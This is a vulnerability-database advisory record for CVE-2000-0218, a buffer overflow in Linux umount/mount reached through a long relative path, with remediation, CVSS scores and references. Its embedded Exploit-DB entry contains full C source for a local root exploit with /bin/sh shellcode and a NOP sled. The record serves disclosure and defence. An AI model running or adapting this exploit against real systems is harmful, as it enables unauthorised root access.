ID OSVDB:7004 Type osvdb Reporter OSVDB Modified 2000-02-03T00:00:00
Description
Vulnerability Description
A local overflow exists in some Linux distributions. The umount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
Solution Description
Upgrade to version indicated in vendor advisory or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
A local overflow exists in some Linux distributions. The umount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
{"edition": 1, "title": "Linux umount Long Relative Path Overflow", "bulletinFamily": "software", "published": "2000-02-03T00:00:00", "lastseen": "2017-04-28T13:20:02", "history": [], "modified": "2000-02-03T00:00:00", "reporter": "OSVDB", "hash": "8584ab3dea6744e38d42f762c59e94228157fda7dd95f11ec0019ebb873a63ef", "viewCount": 0, "href": "https://vulners.com/osvdb/OSVDB:7004", "description": "## Vulnerability Description\nA local overflow exists in some Linux distributions. The umount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version indicated in vendor advisory or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in some Linux distributions. The umount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/suse_security_announce_39.txt)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2000-002.0.txt)\n[Related OSVDB ID: 6980](https://vulners.com/osvdb/OSVDB:6980)\nISS X-Force ID: 7156\n[CVE-2000-0218](https://vulners.com/cve/CVE-2000-0218)\n", "affectedSoftware": [{"name": "Linux", "version": "6.2", "operator": "eq"}, {"name": "OpenLinux Desktop", "version": "2.3", "operator": "eq"}, {"name": "Linux", "version": "6.3", "operator": "eq"}, {"name": "Linux", "version": "6.1", "operator": "eq"}, {"name": "Linux", "version": "6.0", "operator": "eq"}, {"name": "OpenLinux eServer", "version": "2.3", "operator": "eq"}], "type": "osvdb", "hashmap": [{"key": "affectedSoftware", "hash": "724e8cc9c8e114305f8d901276f0932a"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "1bbecdddc0ca31b7e157fb1781e723d8"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "032727e07aa05fce2d9f44489d79eed5"}, {"key": "href", "hash": "2600bd174ff1a8dfcc0cf6d45d704340"}, {"key": "modified", "hash": "e2c783a80c439071cb3ced03a5206cb3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "e2c783a80c439071cb3ced03a5206cb3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "f74656b5c24dcb45326b6008953f34c4"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"vector": "NONE", "value": 7.2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0218"]}, {"type": "osvdb", "idList": ["OSVDB:6980"]}, {"type": "exploitdb", "idList": ["EDB-ID:321"]}], "modified": "2017-04-28T13:20:02"}, "vulnersScore": 7.2}, "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "cvelist": ["CVE-2000-0218"], "id": "OSVDB:7004"}
{"cve": [{"lastseen": "2016-09-03T02:35:20", "bulletinFamily": "NVD", "description": "Buffer overflow in Linux mount and umount allows local users to gain root privileges via a long relative pathname.", "modified": "2008-09-10T15:03:19", "published": "2000-02-03T00:00:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0218", "id": "CVE-2000-0218", "title": "CVE-2000-0218", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:10:04", "bulletinFamily": "exploit", "description": "Linux & BSD umount Local Root Exploit. CVE-2000-0218. Local exploits for multiple platform", "modified": "1996-08-13T00:00:00", "published": "1996-08-13T00:00:00", "id": "EDB-ID:321", "href": "https://www.exploit-db.com/exploits/321/", "type": "exploitdb", "title": "BSD & Linux - umount Local Root Exploit", "sourceData": "/* Reminder - Be sure to fix the includes /str0ke */\r\n-------------------------------------- linux_umount_exploit.c ----------\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#define PATH_MOUNT \"/bin/umount\"\r\n#define BUFFER_SIZE 1024\r\n#define DEFAULT_OFFSET 50\r\n\r\nu_long get_esp()\r\n{\r\n __asm__(\"movl %esp, %eax\");\r\n\r\n}\r\n\r\nmain(int argc, char **argv)\r\n{\r\n u_char execshell[] =\r\n \"\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\"\r\n \"\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\"\r\n \"\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\\xff\\xff\\xff/bin/sh\";\r\n\r\n char *buff = NULL;\r\n unsigned long *addr_ptr = NULL;\r\n char *ptr = NULL;\r\n\r\n int i;\r\n int ofs = DEFAULT_OFFSET;\r\n\r\n buff = malloc(4096);\r\n if(!buff)\r\n {\r\n printf(\"can't allocate memory\\n\");\r\n exit(0);\r\n }\r\n ptr = buff;\r\n\r\n /* fill start of buffer with nops */\r\n\r\n memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));\r\n ptr += BUFFER_SIZE-strlen(execshell);\r\n\r\n /* stick asm code into the buffer */\r\n\r\n for(i=0;i < strlen(execshell);i++)\r\n *(ptr++) = execshell[i];\r\n\r\n addr_ptr = (long *)ptr;\r\n for(i=0;i < (8/4);i++)\r\n *(addr_ptr++) = get_esp() + ofs;\r\n ptr = (char *)addr_ptr;\r\n *ptr = 0;\r\n\r\n (void)alarm((u_int)0);\r\n execl(PATH_MOUNT, \"umount\", buff, NULL);\r\n}\r\n\n\n// milw0rm.com [1996-08-13]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/321/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in some Linux distributions. The mount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version indicated in vendor advisory or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in some Linux distributions. The mount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/suse_security_announce_39.txt)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2000-002.0.txt)\n[Related OSVDB ID: 7004](https://vulners.com/osvdb/OSVDB:7004)\nISS X-Force ID: 7156\n[CVE-2000-0218](https://vulners.com/cve/CVE-2000-0218)\n", "modified": "2000-02-03T00:00:00", "published": "2000-02-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6980", "id": "OSVDB:6980", "title": "Linux mount Long Relative Path Overflow", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
